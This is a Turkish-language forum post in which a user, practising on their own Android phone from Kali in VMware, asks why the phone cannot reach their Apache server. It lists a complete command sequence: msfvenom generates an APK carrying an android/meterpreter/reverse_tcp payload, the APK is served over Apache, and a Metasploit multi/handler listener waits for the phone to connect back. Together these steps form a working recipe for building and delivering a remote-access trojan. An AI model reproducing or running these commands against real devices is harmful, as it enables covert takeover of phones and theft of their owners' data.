Merhabalar. Kendi android cihazıma .apk dosyası gondermek ve Kali uzerinden sızmak istiyorum. Fakat exploit komutunu verdikten sonra VMware'de terminal'de şu komut ekranında kalıyor.

Started reverse TCP handler on 192.168.x.xx:4444

ifconfig komutunu girdikten sonra cıkan IP adresini kopyalayıp o şekilde yapıyorum. Bu arada NAT secili ağ ayarlarından VMware'de.

Bir de ilginc bir durum şu kendi Android cihazımdan başlatmış olduğum IP adresine giremiyorum arkadaşlar.

Komutlar şunlar:

1. ifconfig
2. msfvenom -help
3. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.xx LPORT=4444 R > /var/www/html/androidApp.apk
4. service apache2 status (Daha once başlatmıştım) service apache2 start komutu ile
5. msfconsole
6. use exploit/multi/handler
7. set payload android/meterpreter/reverse_tcp
8. show options
9. set LHOST 192.168.x.xx
10. show options (yeniden)
11. exploit

exploit işte bu komutu girdikten sonra şoyle bir komut satırı geliyor ve o ekranda kalıyor. Dediğim gibi bundan sonra telefona .apk dosyasını indirmek istiyorum ama sunucuya ulaşamıyorum telefonumdan Apache Server'e.

Boyle bir ekranda kalıyor. Rehberi buraya tıklayarak izleyebilirsiniz. Şuradaki adamın yaptığının aynısını yapıyorum.

[*] Started reverse TCP handler on 192.168.x.xx:4444